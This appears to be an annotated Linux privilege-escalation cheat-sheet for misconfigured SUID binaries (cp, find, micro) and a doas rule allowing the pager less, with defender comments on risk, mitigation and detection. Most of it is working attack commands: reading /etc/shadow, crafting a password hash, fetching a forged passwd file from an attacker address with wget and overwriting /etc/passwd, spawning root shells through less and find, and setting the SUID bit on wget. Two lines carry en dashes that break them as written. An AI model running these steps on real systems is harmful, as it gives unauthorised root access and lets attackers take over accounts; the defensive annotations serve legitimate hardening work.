# Privilege-escalation notes for misconfigured SUID binaries and doas rules.
# This is a cheat-sheet, not a runnable script: each line is meant to be typed
# interactively on the target, and a few lines (`:!sh`) are key sequences for a
# pager/editor rather than shell commands. Reviewer annotations below name the
# misconfiguration each snippet depends on and how a defender detects or
# removes it.

# cp -- If cp is SUID, you can copy privileged files to /tmp and read them
# Risk: a SUID cp bypasses file permissions on both the read and the write
# side, so any local user can read /etc/shadow and replace /etc/passwd.
# Mitigation: clear the SUID bit on cp (it never needs one).
# Detection: periodically inventory SUID files (find / -perm -4000 -type f)
# and diff against a known-good list; alert on any write to /etc/passwd or
# /etc/shadow that does not come from passwd/useradd/package tooling.
cp /etc/shadow /tmp
# generate new account
# -1 selects the MD5-based crypt format; the resulting hash is what goes into
# the crafted passwd entry. The salt/password here are placeholders.
openssl passwd -1 -salt username password
# Then create a fake /etc/passwd file, upload it to the target and cp
# Detection: an outbound HTTP fetch from a server to an ad-hoc port (8000 here)
# followed by an mtime/inode change on /etc/passwd is a high-confidence
# signal; file-integrity monitoring on /etc catches the overwrite itself.
wget http://192.168.1.111:8000/passwd
cp passwd /etc/passwd
/usr/bin/doas
# doas
# Risk: a doas.conf rule that lets a user run an interactive pager as root is a
# shell escape waiting to happen -- less can spawn an editor (v) and run
# shell commands (!), and the child inherits root.
# Mitigation: never grant pagers or editors via doas/sudo; give read access to
# the log through group membership or a non-interactive wrapper instead.
# Detection: review doas.conf for interactive tools, and alert on a shell whose
# parent process is less/vi running as root.
cat /etc/doas.conf
doas /usr/bin/less /var/log/authlog
# Press v to escape into vi (less opens an editor on the current file), then
# the line below is typed inside vi, not at the shell prompt
:!sh
/usr/bin/find
# find
# Risk: -exec runs an arbitrary command with find's effective uid, so a SUID
# find is equivalent to a root shell. The chmod below additionally marks wget
# SUID, creating a second privileged binary on the host.
# Mitigation: clear the SUID bit on find; detection is the SUID inventory audit
# above plus auditing chmod calls that add the setuid bit (e.g. an auditd rule
# on the chmod/fchmodat syscalls, or FIM on /usr/bin).
touch raj
find raj -exec "whoami"\;
find raj -exec "/bin/sh"\;# another method
# NOTE(review): the dash before "exec" and "la" on the next two lines is
# U+2013 (en dash), not the ASCII hyphen -- an artifact of how the page was
# copied. Left unchanged here.
find /home –exec chmod u+s /usr/bin/wget \;
ls –la /usr/bin/wget
cat /etc/passwd
# then create another etc/passwd file and upload it
/usr/bin/micro
# micro editor
# Risk: if micro is SUID (the page's premise for this section), it reads and
# writes any file as root; piping /etc/passwd into it simply opens the file
# for editing under root's uid.
# Mitigation: editors must never carry the SUID bit. Detection is the same
# as for cp above: SUID inventory diffs plus alerting on /etc/passwd changes.
cat /etc/passwd | /usr/bin/micro
# Then generate another user
# Same MD5-crypt hash generation as above; user3/pass123 are placeholders.
openssl passwd -1 -salt user3 pass123